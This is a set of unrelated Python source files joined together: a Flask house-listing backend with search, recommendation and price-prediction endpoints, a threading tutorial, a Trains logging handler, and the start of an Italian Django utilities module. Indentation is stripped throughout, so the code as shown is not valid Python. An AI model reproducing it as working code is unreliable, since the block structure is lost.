decorationEnum = enumMachine.Ddecoration.values
decoration = []
for item in decorationEnum:
decoration.append(enumMachine.Ddecoration.enum2field(item))
heatingEnum = request.json.get('heating')
if heatingEnum == []:
heatingEnum = enumMachine.Heating.values
heating = []
for item in heatingEnum:
heating.append(enumMachine.Heating.enum2field(item))
elevatorEnum = request.json.get('elevator')
if elevatorEnum == []:
elevatorEnum = enumMachine.Elevator.values
elevator = []
for item in elevatorEnum:
elevator.append(enumMachine.Elevator.enum2field(item))
pageNum = request.json.get('pageNum')
pageSize = request.json.get('pageSize')
searchString = request.json.get('searchString')
argdict = {
"timeRange": timeRange,
"totalPriceRange": totalPriceRange,
"unitPriceRange": unitPriceRange,
"area": area,
"district": district,
"houseStructrue": houseStructrue,
"direction": direction_list,
"decoration": decoration,
"heating": heating,
"elevator": elevator,
"pageNum": pageNum,
"pageSize": pageSize,
"searchString": searchString
}
# list of house records to return
houseList = []
direction = {}
# #process the drection
# direction=argdict[direction]
direction = {
"west": "west" if "west" in direction_list else "no",
"east": "east" if "east" in direction_list else "no",
"south": "south" if "south" in direction_list else "no",
"north": "north" if "north" in direction_list else "no",
"southwest": "southwest" if "southwest" in direction_list else "no",
"southeast": "southeast" if "southeast" in direction_list else "no",
"northeast": "northeast" if "northeast" in direction_list else "no",
"northwest": "northwest" if "northwest" in direction_list else "no"
}
def filterDirection(l1, l2):
l1.append('no')
for element in l2:
if element not in l1:
return False
return True
def convertListToEnum(li):
print("strart to convert ")
for e in li:
e['position'] = enumMachine.Region.field2enum(e['position'])
e['district'] = enumMachine.District.field2enum(e['district'])
return li
# print(direction)
# print(request.json)
print("The filter requirement is:")
print(argdict)
print('searchString: ', searchString)
houses = []
total = 0
document = {}
document_id = 0
houses = House.query.filter().all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
#####Search Engine
stopwords = set() # A set to store the stopwords
with open("stopwords.txt") as f:
for line in f:
line = line[:-1] # Remove the /n in the back of the line
stopwords.add(line)
if not os.path.exists(
"home_search.txt"): # The following code are for indexing, will only run on the first run.
preProcessing(document)
######### indexing finish
file = open('home_search.txt', 'r') # open the index file and store to a dictionary
# t4 = time()
js = file.read()
index = json.loads(js)
# t5 = time()
print("done")
query = searchString
query = query.lower()
similarity = {} # A dict storing the similarity; the key is the document id, the value is the score
query_term = [] # A list storing the query terms after stop-word removal
for elements in query.split(" "):
if elements not in stopwords: # remove stopwords
query_term.append(elements)
for documents in index: # calculate similarity score for every document
score = 0
for terms in query_term:
if terms in index[documents]:
score += (index[documents])[terms]
similarity[documents] = score
result = sorted(similarity.items(), key=lambda x: x[1], reverse=True) # Sort by similarity
rank = 1
for r in result: # Collect matching results (the original top-15 cut-off is commented out below)
# print("rank: ", rank, "document: ", document[int(r[0])], "score: ", r[1])
if r[1] > 0 or searchString == '':
houseList.append(document[int(r[0])])
rank += 1
# if rank == 16:
# break
p_max = len(houseList)
total = p_max
print(p_max)
# p_start = (int(pageNum) - 1) * int(pageSize)
# p_end = p_start + 10
# if p_end > p_max:
# p_end = p_max
# houseList = houseList[p_start:p_end]
filter_List = []
if direction_listEnum == enumMachine.Direction.values:
for h in houseList:
if h['title'] != '':
if (argdict['totalPriceRange'][0] <= int(h['totalPrice']) <= argdict['totalPriceRange'][1] and
argdict['area'][0] <= float((h['describe'].split('|')[1]).split(' ')[0]) <= argdict['area'][
1] and
argdict['unitPriceRange'][0] <= int(h['unitPrice']) <= argdict['unitPriceRange'][1] and
h['district'] in (argdict["district"]) and
(h['describe'].split('|')[4]).split(' ')[1] in (argdict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (argdict["decoration"]) and
h['otherInfo'].split('|')[1] in (argdict["heating"]) and
h['otherInfo'].split('|')[2] in (argdict["elevator"])
):
filter_List.append(h)
total = len(filter_List)
print("filter List\n")
print(filter_List)
print(total, '111')
# total=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
#
# # House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# # ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# # ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).count()
# Query the database for records within the price range
else:
for h in houseList:
if h['title'] != '':
if (argdict['totalPriceRange'][0] <= int(h['totalPrice']) <= argdict['totalPriceRange'][1] and
argdict['area'][0] <= float((h['describe'].split('|')[1]).split(' ')[0]) <= argdict['area'][
1] and
argdict['unitPriceRange'][0] <= int(h['unitPrice']) <= argdict['unitPriceRange'][1] and
h['district'] in (argdict["district"]) and
filterDirection((h['describe'].split('|')[2]).split(' '), argdict['direction']) and
(h['describe'].split('|')[4]).split(' ')[1] in (argdict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (argdict["decoration"]) and
h['otherInfo'].split('|')[1] in (argdict["heating"]) and
h['otherInfo'].split('|')[2] in (argdict["elevator"])
):
filter_List.append(h)
total = len(filter_List)
print(total, '222')
p_start = (int(pageNum) - 1) * int(pageSize)
p_end = p_start + 10
if p_end > total:
p_end = total
filter_List = filter_List[p_start:p_end]
user = User.query.filter(User.id == userId).first()
houses = user.collections
hids = []
for i in houses:
hids.append(i.id)
for item in filter_List:
hid = item['houseId']
if hid in hids:
item['collected'] = "true"
else:
item["collected"] = "false"
# convertListToEnum(filter_List)
# houses=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
# #
# House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).all()
# total=House.query.filter(House.price >argdict['totalPriceRange'][0],House.price<argdict['totalPriceRange'][1],
# House.floor_area >argdict['area'][0],House.floor_area<argdict['area'][1],
# House._unit_price>argdict['unitPriceRange'][0],House._unit_price<argdict['unitPriceRange'][1],
# House.District.in_(argdict["district"]),
# House.House_structure.in_(argdict['houseStructrue']),
#
# House.east==direction["east"],House.west==direction["west"],House.east_north==direction["northeast"],House.east_south==direction["southeast"]
# ,House.north==direction["north"],House.south==direction["south"],House.west_south==direction["southwest"],House.east_south==direction["southwest"]
# ,
# House.Interior_design.in_(argdict["decoration"]),
# House.heating.in_(argdict["heating"])
# ,House.elevator.in_(argdict["elevator"])
# ).count()
#
# for item in houses:
# houseList.append(item.generateDetail())
#
# print(houses)
# print(total)
return {
"success": 1,
"data": {
"total": total,
"houseList": filter_List
},
"error": None
}
else:
return {
"success": 1,
"data": {
"total": 'total',
"houseList": 'houseList'
},
"error": None
}
####################################
# 3.2. Add-to-collection (favorites) endpoint: ###
####################################
# Input
# @list.route("/addCollection",methods=['GET','POST'])
# def addCollection():
#
# Commented-out reference section
# @list.route("/getHouseList", methods=['GET', 'POST'])
# def houses():
# #connect to the database
# #db.session
# #HouseList = []
# #HouseList=db.session.query(...).all
#
#
# return {
# "success": 1,
# "data": {
# "total": 100,
# "houseList":[
# {
# "imgUrl":"None",
# "title":"Name",
# "describe":"describe1",
# "position":"term",
# "coordinate":"none",
# "houseId":"0",
# "price":"1",
# "Collected": "true"
#
# }, {
# "imgUrl":"None",
# "title":"None",
# "describe":"None",
# "position":"None",
# "coordinate":"None",
# "houseId":"2",
# "price":"1",
# "Collected": "true"
#
# },
# ]
# },
# "error":None
# }
# @list.route("/getHouseList", methods=['GET', 'POST'])
# def houses():
# #connect to the database
# #db.session
# #HouseList = []
# #HouseList=db.session.query(...).all
#
# fd = [{'title': 'The corner gate of Majiabao has two bedrooms and double balcony, with convenient transportation',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 0,
# 'describe': '2 room 1 halls | 75.43square meters | south west north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 52897,
# 'collected': 'true',
# 'totalPrice': '3.99',
# 'imgUrl': 'https://img1.baidu.com/it/u=1947907598,3262319172&fm=26&fmt=auto&gp=0.jpg'},
# {
# 'title': 'The corner gate of Majiabao is close to the subway, with good north-south transparency, sufficient lighting and complete supporting facilities',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 1,
# 'describe': '2 room 1 halls | 69.1square meters | south north | Banlou | middle_floor ( total: 6 )',
# 'unitPrice': 60203,
# 'collected': 'true',
# 'totalPrice': '4.16',
# 'imgUrl': 'https://img1.baidu.com/it/u=1267115342,3426495198&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Dongli, full of five unique, sincere sale, easy to see',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 2,
# 'describe': '2 room 1 halls | 73.63square meters | north southeast | tower | high_floor ( total: 19 )',
# 'unitPrice': 51202,
# 'collected': 'true',
# 'totalPrice': '3.77',
# 'imgUrl': 'https://img1.baidu.com/it/u=632875621,3849475090&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Majiabao Jiaomen Dongli two bedroom Jiaomen East Station',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 3,
# 'describe': '2 room 1 halls | 64.8square meters | south | tower | low_floor ( total: 19 )',
# 'unitPrice': 59723,
# 'collected': 'true',
# 'totalPrice': '3.87',
# 'imgUrl': 'https://img2.baidu.com/it/u=428922356,2955791946&fm=26&fmt=auto&gp=0.jpg'},
# {
# 'title': 'The corner gate of Majiabao is accessible from north to south, and the floor is full of five only two bedrooms',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 4,
# 'describe': '2 room 1 halls | 53.9square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 56587,
# 'collected': 'true',
# 'totalPrice': '3.05',
# 'imgUrl': 'https://img1.baidu.com/it/u=1206287871,1293580609&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen Majiabao Manwu subway line 10 Line 4 Jiaomen west station',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 5,
# 'describe': '2 room 1 halls | 54.1square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 60999,
# 'collected': 'true',
# 'totalPrice': '3.3',
# 'imgUrl': 'https://img0.baidu.com/it/u=3070448361,252388962&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Fine decoration of three bedroom low floor in dongsida community, Jiaomen, Majiabao',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 6,
# 'describe': '3 room 1 halls | 76.12square meters | south north | Banlou | low_floor ( total: 6 )',
# 'unitPrice': 52286,
# 'collected': 'true',
# 'totalPrice': '3.98',
# 'imgUrl': 'https://img2.baidu.com/it/u=3614374747,1028706245&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Sunshine Garden Corner Gate East Majiabao dahongmen north south two houses',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 7,
# 'describe': '2 room 1 halls | 89.99square meters | south north | Banlou | top_floor ( total: 19 )',
# 'unitPrice': 75564,
# 'collected': 'true',
# 'totalPrice': '6.8',
# 'imgUrl': 'https://img0.baidu.com/it/u=25061059,992130011&fm=26&fmt=auto&gp=0.jpg'},
# {'title': 'Jiaomen, Majiabao, Yangqiao, the only regular two bedroom in five years',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 8,
# 'describe': '2 room 1 halls | 70.4square meters | south north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 57245,
# 'collected': 'true',
# 'totalPrice': '4.03',
# 'imgUrl': 'https://img2.baidu.com/it/u=1126845708,2463843041&fm=11&fmt=auto&gp=0.jpg'},
# {'title': 'Yangqiao, Majiabao, two bedrooms in Jiaomen Dongli community',
# 'position': 'Fengtai-Corner_Gate',
# 'houseId': 9,
# 'describe': '2 room 1 halls | 54.11square meters | south north | Banlou | high_floor ( total: 6 )',
# 'unitPrice': 60063,
# 'collected': 'true',
# 'totalPrice': '3.25',
# 'imgUrl': 'https://img0.baidu.com/it/u=3774158723,4269643202&fm=11&fmt=auto&gp=0.jpg'}]
# nDict = {
# "success": 1,
# "data": {
# "total": 100,
# "houseList": fd
# },
# "error": None
# }
# str_json = json.dumps(nDict, indent=2, ensure_ascii=False)
# return str_json
#
#
#
@houseList.route("/recommendHouse", methods=['GET', 'POST'])
def recommendHouse():
u_id = request.json.get('userId')
print(u_id)
return {
"success": 1,
"data": {
"houseList": recommend(u_id)
},
"error": None
}
def recommend(c_id):
print("####################Test for recommender###########################")
def filterDirection(l1, l2):
l1.append('no')
for element in l2:
if element not in l1:
return False
return True
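# Illustrative examples of the helper above: filterDirection returns True only when every direction
# requested by the user appears in the house's direction list; 'no' is appended first so it always
# counts as satisfied.
#   filterDirection(['south', 'north'], ['south'])  -> True
#   filterDirection(['south'], ['east'])            -> False
#   filterDirection(['south'], ['no'])              -> True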
if c_id is None or c_id == '':
document = {}
document_id = 0
houses = House.query.filter(House.saled == 'FALSE').all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
recommend_list = list(document.values())
else:
c_id = int(c_id)
c_target = Targets.query.filter(Targets.id == c_id).first()
tP = c_target.totalPriceRange.split(',')
up = c_target.unitPriceRange.split(',')
ar = c_target.area.split(',')
ds = c_target.district.split(',')
he = c_target.heating.split(',')
hs = c_target.houseStructure.split(',')
dr = c_target.direction.split(',')
de = c_target.decoration.split(',')
el = c_target.elevator.split(',')
targetDict = {
"totalPriceRange": tP,
"unitPriceRange": up,
"area": ar,
"district": ds,
"houseStructrue": hs,
"direction": dr,
"decoration": de,
"heating": he,
"elevator": el,
}
document = {}
document_id = 0
houses = House.query.filter(House.saled == 'FALSE').all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
recommend_list = []
hList = document.values()
for h in hList:
if h['title'] != '':
if (int(targetDict['totalPriceRange'][0]) <= int(h['totalPrice']) <= int(
targetDict['totalPriceRange'][1]) and
float(targetDict['area'][0]) <= float((h['describe'].split('|')[1]).split(' ')[0]) <= float(
targetDict['area'][
1]) and
int(targetDict['unitPriceRange'][0]) <= int(h['unitPrice']) <= int(
targetDict['unitPriceRange'][1]) and
h['district'] in (targetDict["district"]) and
filterDirection((h['describe'].split('|')[2]).split(' '), targetDict['direction']) and
(h['describe'].split('|')[4]).split(' ')[1] in (targetDict['houseStructrue']) and
h['otherInfo'].split('|')[0] in (targetDict["decoration"]) and
h['otherInfo'].split('|')[1] in (targetDict["heating"]) and
h['otherInfo'].split('|')[2] in (targetDict["elevator"])
):
recommend_list.append(h)
if len(recommend_list) < 3:
for i in range(3 - len(recommend_list)):
recommend_list.append(document[random.randint(0, len(document) - 1)])
r_lenth = len(recommend_list)
return_list = []
random_index = []
for i in range(0, 3):
temp = random.randint(0, r_lenth - 1)
while temp in random_index:
temp = random.randint(0, r_lenth - 1)
random_index.append(temp)
for i in range(0, 3):
return_list.append(recommend_list[random_index[i]])
print(return_list)
return return_list
@houseList.route("/returnCommunity", methods=['GET', 'POST'])
def returnCommunity():
s_string = request.json.get('searchString')
return {
"success": 1,
"data": {
"community": searchCommunity(s_string)
},
"error": None
}
estimator = joblib.load('model.pkl')
@houseList.route("/prediction", methods=['GET', 'POST'])
def prediction():
# s_string = request.json.get('searchString')
area = float(request.json.get('area'))
bathroom = request.json.get('bathroom')
buildingStructure = request.json.get('buildingStructure')
buildingType = request.json.get('buildingType')
community = request.json.get('community')
decoration = request.json.get('decoration')
direction = request.json.get('direction')
district = request.json.get('district')
elevator = request.json.get('elevator')
elevatorNum = int(request.json.get('elevatorNum'))
floorType = request.json.get('floorType')
floors = request.json.get('floors')
hall = request.json.get('hall')
heating = request.json.get('heating')
houseNum = int(request.json.get('houseNum'))
houseStructure = request.json.get('houseStructure')
kitchen = request.json.get('kitchen')
property_ = request.json.get('property')
region = int(request.json.get('region'))
room = request.json.get('room')
community_convert = data[community]
direction_convert = [0, 0, 0, 0, 0, 0, 0, 0]
for i in range(len(direction) - 1):
direction_convert[int(direction[i])] = 1
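# Sketch of the assumed encoding above: 'direction' is expected to be a sequence of digit codes
# (0-7, one per compass direction) whose last element is skipped, and each code switches on the
# corresponding slot of the 8-element one-hot vector. For example, direction ['0', '3', ''] would
# yield direction_convert == [1, 0, 0, 1, 0, 0, 0, 0].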
predictArray = [property_, area, houseStructure, buildingType, buildingStructure, decoration,
elevatorNum / houseNum,
heating, elevator, district, community_convert, region, hall, kitchen, bathroom, floorType, floors]
for element in direction_convert:
predictArray.append(element)
predictArray.append(room)
# Load Model
print(os.getcwd())
# Feature order: property rights, floor area, house structure, building type, building structure, decoration, elevator/household ratio, heating, elevator, district, community, region, halls, kitchens, bathrooms, floor type, total floors, direction one-hot (E S W N SE NE SW NW), rooms
# estimate_price = estimator.predict(
# [[0, 100, 0, 0, 0, 0, 1, 0, 0, 10, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1]])
estimate_price = estimator.predict([predictArray])[0]
print(estimate_price, '############Test for ml')
return {
"success": 1,
"data": {
"price": estimate_price
},
"error": None
}
@houseList.route("/update_bm25", methods=['GET', 'POST'])
def update_bm25():
# while True:
# # time.sleep(3600)
document = {}
document_id = 0
houses = House.query.filter().all()
for h in houses:
temp_h = h.generateDetail()
document[document_id] = temp_h
document_id += 1
#####Search Engine
stopwords = set() # A set to store the stopwords
with open("stopwords.txt") as f:
for line in f:
line = line[:-1]  # Remove the trailing "\n" at the end of the line
stopwords.add(line)
preProcessing(document)
return {
"success": 1,
"error": None
}
# t1 = threading.Thread(target=update_bm25)  # target specifies the function the sub-thread runs; its arguments can be passed via args=<tuple>.
# t1.start()
|
py_ad_1_3.py
|
"""
Section 1
Multithreading - Thread (1) - Basic
Keyword - Threading basic
"""
import logging
import threading
import time
# Thread worker function
def thread_func(name):
logging.info("Sub-Thread %s: starting", name)
time.sleep(3)
logging.info("Sub-Thread %s: finishing", name)
# Main section
if __name__ == "__main__":
# Configure the logging format
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
logging.info("Main-Thread: before creating thread")
# Create the thread, passing the target function and its arguments (args must be a tuple)
x = threading.Thread(target=thread_func, args=("First",))
logging.info("Main-Thread: before running thread")
# Start the sub-thread
x.start()
# Compare the output with and without the join() call below
x.join()  # The main thread waits until the sub-thread finishes its work.
logging.info("Main-Thread: wait for the thread to finish")
logging.info("Main-Thread: all done")
|
log.py
|
import json
import sys
import time
from pathlib2 import Path
from logging import LogRecord, getLogger, basicConfig, getLevelName, INFO, WARNING, Formatter, makeLogRecord, warning
from logging.handlers import BufferingHandler
from threading import Thread, Event
from six.moves.queue import Queue
from ...backend_api.services import events
from ...backend_api.session.session import MaxRequestSizeError
from ...config import config
buffer_capacity = config.get('log.task_log_buffer_capacity', 100)
class TaskHandler(BufferingHandler):
__flush_max_history_seconds = 30.
__wait_for_flush_timeout = 10.
__max_event_size = 1024 * 1024
__once = False
__offline_filename = 'log.jsonl'
@property
def task_id(self):
return self._task_id
@task_id.setter
def task_id(self, value):
self._task_id = value
def __init__(self, task, capacity=buffer_capacity):
super(TaskHandler, self).__init__(capacity)
self.task_id = task.id
self.session = task.session
self.last_timestamp = 0
self.counter = 1
self._last_event = None
self._exit_event = None
self._queue = None
self._thread = None
self._pending = 0
self._offline_log_filename = None
if task.is_offline():
offline_folder = Path(task.get_offline_mode_folder())
offline_folder.mkdir(parents=True, exist_ok=True)
self._offline_log_filename = offline_folder / self.__offline_filename
def shouldFlush(self, record):
"""
Should the handler flush its buffer
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
if self._task_id is None:
return False
# if we need to add handlers to the base_logger,
# it will not automatically create a stream handler on first use, so we must configure it manually.
if not TaskHandler.__once:
base_logger = getLogger()
if len(base_logger.handlers) == 1 and isinstance(base_logger.handlers[0], TaskHandler):
if record.name != 'console' and not record.name.startswith('trains.'):
base_logger.removeHandler(self)
basicConfig()
base_logger.addHandler(self)
TaskHandler.__once = True
else:
TaskHandler.__once = True
# if we passed the max buffer
if len(self.buffer) >= self.capacity:
return True
# if the first entry in the log was too long ago.
# noinspection PyBroadException
try:
if len(self.buffer) and (time.time() - self.buffer[0].created) > self.__flush_max_history_seconds:
return True
except Exception:
pass
return False
def _record_to_event(self, record):
# type: (LogRecord) -> events.TaskLogEvent
if self._task_id is None:
return None
timestamp = int(record.created * 1000)
if timestamp == self.last_timestamp:
timestamp += self.counter
self.counter += 1
else:
self.last_timestamp = timestamp
self.counter = 1
# ignore backspaces (they are often used)
full_msg = record.getMessage().replace('\x08', '')
return_events = []
while full_msg:
msg = full_msg[:self.__max_event_size]
full_msg = full_msg[self.__max_event_size:]
# unite all records in a single second
if self._last_event and timestamp - self._last_event.timestamp < 1000 and \
len(self._last_event.msg) + len(msg) < self.__max_event_size and \
record.levelname.lower() == str(self._last_event.level):
# ignore backspaces (they are often used)
self._last_event.msg += '\n' + msg
continue
# if we have a previous event and it timed out, return it.
new_event = events.TaskLogEvent(
task=self.task_id,
timestamp=timestamp,
level=record.levelname.lower(),
worker=self.session.worker,
msg=msg
)
if self._last_event:
return_events.append(self._last_event)
self._last_event = new_event
return return_events
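# Added note on the batching above: each record is split into chunks of at most __max_event_size
# characters, and a chunk is merged into the previous pending event (joined with a newline) when
# it has the same log level, falls within the same second and still fits under the size limit;
# the pending event is only emitted once a chunk can no longer be merged into it.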
def flush(self):
if self._task_id is None:
return
if not self.buffer:
return
buffer = None
self.acquire()
if self.buffer:
buffer = self.buffer
self.buffer = []
self.release()
if not buffer:
return
# noinspection PyBroadException
try:
record_events = [r for record in buffer for r in self._record_to_event(record)] + [self._last_event]
self._last_event = None
batch_requests = events.AddBatchRequest(requests=[events.AddRequest(e) for e in record_events if e])
except Exception:
self.__log_stderr("WARNING: trains.log - Failed logging task to backend ({:d} lines)".format(len(buffer)))
batch_requests = None
if batch_requests and batch_requests.requests:
self._pending += 1
self._add_to_queue(batch_requests)
def _create_thread_queue(self):
if self._queue:
return
self._queue = Queue()
self._exit_event = Event()
self._exit_event.clear()
# multiple workers could be supported as well
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def _add_to_queue(self, request):
self._create_thread_queue()
self._queue.put(request)
def close(self, wait=False):
# self.__log_stderr('Closing {} wait={}'.format(os.getpid(), wait))
# flush pending logs
if not self._task_id:
return
# avoid deadlocks just skip the lock, we are shutting down anyway
self.lock = None
self.flush()
# shut down the TaskHandler, from this point onwards. No events will be logged
_thread = self._thread
self._thread = None
if self._queue:
self._exit_event.set()
self._queue.put(None)
self._task_id = None
if wait and _thread:
# noinspection PyBroadException
try:
timeout = 1. if self._queue.empty() else self.__wait_for_flush_timeout
_thread.join(timeout=timeout)
if not self._queue.empty():
self.__log_stderr('Flush timeout {}s exceeded, dropping last {} lines'.format(
timeout, self._queue.qsize()))
# self.__log_stderr('Closing {} wait done'.format(os.getpid()))
except Exception:
pass
# call super and remove the handler
super(TaskHandler, self).close()
def _send_events(self, a_request):
try:
self._pending -= 1
if self._offline_log_filename:
with open(self._offline_log_filename.as_posix(), 'at') as f:
f.write(json.dumps([b.to_dict() for b in a_request.requests]) + '\n')
return
# if self._thread is None:
# self.__log_stderr('Task.close() flushing remaining logs ({})'.format(self._pending))
res = self.session.send(a_request)
if res and not res.ok():
self.__log_stderr("failed logging task to backend ({:d} lines, {})".format(
len(a_request.requests), str(res.meta)), level=WARNING)
except MaxRequestSizeError:
self.__log_stderr("failed logging task to backend ({:d} lines) log size exceeded limit".format(
len(a_request.requests)), level=WARNING)
except Exception as ex:
self.__log_stderr("Retrying, failed logging task to backend ({:d} lines): {}".format(
len(a_request.requests), ex))
# we should push ourselves back into the thread pool
if self._queue:
self._pending += 1
self._queue.put(a_request)
def _daemon(self):
# multiple daemons are supported
leave = self._exit_event.wait(0)
request = True
while not leave or request:
# pull from queue
request = None
if self._queue:
# noinspection PyBroadException
try:
request = self._queue.get(block=not leave)
except Exception:
pass
if request:
self._send_events(request)
leave = self._exit_event.wait(0)
# self.__log_stderr('leaving {}'.format(os.getpid()))
@staticmethod
def __log_stderr(msg, level=INFO):
# output directly to stderr, make sure we do not catch it.
write = sys.stderr._original_write if hasattr(sys.stderr, '_original_write') else sys.stderr.write
write('{asctime} - {name} - {levelname} - {message}\n'.format(
asctime=Formatter().formatTime(makeLogRecord({})),
name='trains.log', levelname=getLevelName(level), message=msg))
@classmethod
def report_offline_session(cls, task, folder):
filename = Path(folder) / cls.__offline_filename
if not filename.is_file():
return False
with open(filename.as_posix(), 'rt') as f:
i = 0
while True:
try:
line = f.readline()
if not line:
break
list_requests = json.loads(line)
for r in list_requests:
r.pop('task', None)
i += 1
except StopIteration:
break
except Exception as ex:
warning('Failed reporting log, line {} [{}]'.format(i, ex))
batch_requests = events.AddBatchRequest(
requests=[events.TaskLogEvent(task=task.id, **r) for r in list_requests])
if batch_requests.requests:
res = task.session.send(batch_requests)
if res and not res.ok():
warning("failed logging task to backend ({:d} lines, {})".format(
len(batch_requests.requests), str(res.meta)))
return True
|
utils.py
|
# -*- coding: utf-8 -*-
# Stdlib imports
import base64
import datetime
import hashlib
import json
import jwt
import logging
import re
import threading
from io import BytesIO
# Imports from your apps
from operator import add
# Third-party app imports
from codicefiscale import codicefiscale
from dateutil import tz
from django.conf import settings
from django.http import HttpResponse, JsonResponse
# Core Django imports
from django.shortcuts import render
from django.template.loader import get_template
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode
from xhtml2pdf import pisa
from agency.classes.choices import RoleTag, StatusCode, SUPRESSED_COUNTRY
from agency.models import Operator, AddressMunicipality, AddressCity, AddressNation, SetupTask
from .utils_db import get_attributes_RAO, get_operator_by_username
LOG = logging.getLogger(__name__)
def set_client_ip(request=None):
"""
Restituisce il dizionario "extra" da aggiungere alle chiamate dei LOG
:param request: request
:return: dizionario "extra"
"""
ip = get_client_ip(request)
d = {'client_ip': ip}
return d
def get_client_ip(request):
"""
Restituisce l'IP del client
:param request: request
:return: IP del client
"""
if not request:
return "N.D."
x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', None)
client_ip = request.META.get('HTTP_CLIENT_IP', None)
if x_forwarded_for:
ip = x_forwarded_for.split(',')[0]
elif client_ip:
ip = client_ip
else:
ip = request.META.get('REMOTE_ADDR', None)
return ip
def json_default(value):
"""
Funzione per convertire un attributo di una classe in formato JSON
:param value: attrivuto della classe
:return: attributo in JSON
"""
if isinstance(value, datetime.date):
return dict(year=value.year, month=value.month, day=value.day)
else:
return value.__dict__
def format_crypto(crypto_mail, tag):
"""
Genera un valore booleano sulla base del tag passato in input
:param crypto_mail: valore impostato tabella settings per l'invio della mail
:param tag: CryptoTag
:return: True/False
"""
if crypto_mail == tag:
return True
return False
def calculate_age(born):
"""
Calcola gli anni a partire dalla data di nascita
:born: data di nascita
:return: Età
"""
today = datetime.date.today()
return today.year - born.year - ((today.month, today.day) < (born.month, born.day))
def verify_cf(request):
"""
Verifica che il codice fiscale sia conforme ai dati inseriti nel form, altrimenti mostra quali dati sono errati
:request: request contenente i dati del cittadino
:return: dic con True/False
"""
try:
fiscal_code = request.POST.get('fiscalNumber').upper()
belfiore_code = request.POST.get('placeOfBirth') if request.POST.get('placeOfBirth') else request.POST.get(
'nationOfBirth')
verify_fiscal_code = {
'familyName': fiscal_code[0:3] == codicefiscale.encode_surname(request.POST.get('familyName')),
'name': fiscal_code[3:6] == codicefiscale.encode_surname(request.POST.get('name')),
'gender': codicefiscale.decode(fiscal_code)['sex'] == request.POST.get('gender'),
'dateOfBirth': codicefiscale.decode(fiscal_code)['birthdate'] == datetime.datetime.strptime(
request.POST.get('dateOfBirth'), '%d/%m/%Y'),
'belfiore_code': codicefiscale.decode(fiscal_code)['birthplace']['code'] == belfiore_code
}
if belfiore_code == 'Z998':
verify_fiscal_code['status_code'] = StatusCode.BAD_REQUEST.value
return verify_fiscal_code
calculated_cf = codicefiscale.encode(request.POST.get('familyName'),
request.POST.get('name'),
request.POST.get('gender'),
request.POST.get('dateOfBirth'),
belfiore_code
)
if fiscal_code == calculated_cf.upper():
verify_fiscal_code = {
'status_code': StatusCode.OK.value,
'familyName': True,
'name': True,
'gender': True,
'dateOfBirth': True,
'belfiore_code': True,
}
else:
verify_fiscal_code['status_code'] = StatusCode.ERROR.value
except Exception as e:
LOG.error("Exception: {}".format(str(e)), extra=set_client_ip())
verify_fiscal_code = {
'status_code': StatusCode.EXC.value,
}
return verify_fiscal_code
def render_to_pdf(template_src, context_dict):
"""
Genera un file pdf
:param template_src: template .html del pdf
:param context_dict: dict contenente alcuni dati/settings (es. pagesize)
:return: pagina pdf
"""
template = get_template(template_src)
html = template.render(context_dict)
result = BytesIO()
pdf = pisa.pisaDocument(BytesIO(html.encode("ISO-8859-1")), result)
if not pdf.err:
return HttpResponse(result.getvalue(), content_type='application/pdf')
return Exception()
def download_pdf(params, passphrase=None, pin=None):
"""
Download di un file pdf
:param params: dic contenente informazioni come username dell'operatore, timestamp creazione richiesta etc..
:param passphrase: parte della passphrase da inserire sul pdf (nel caso di un'identificazione)
:param pin: pin temporaneo da inserire sul pdf (nel caso della creazione di un operatore)
:return: pagina pdf
"""
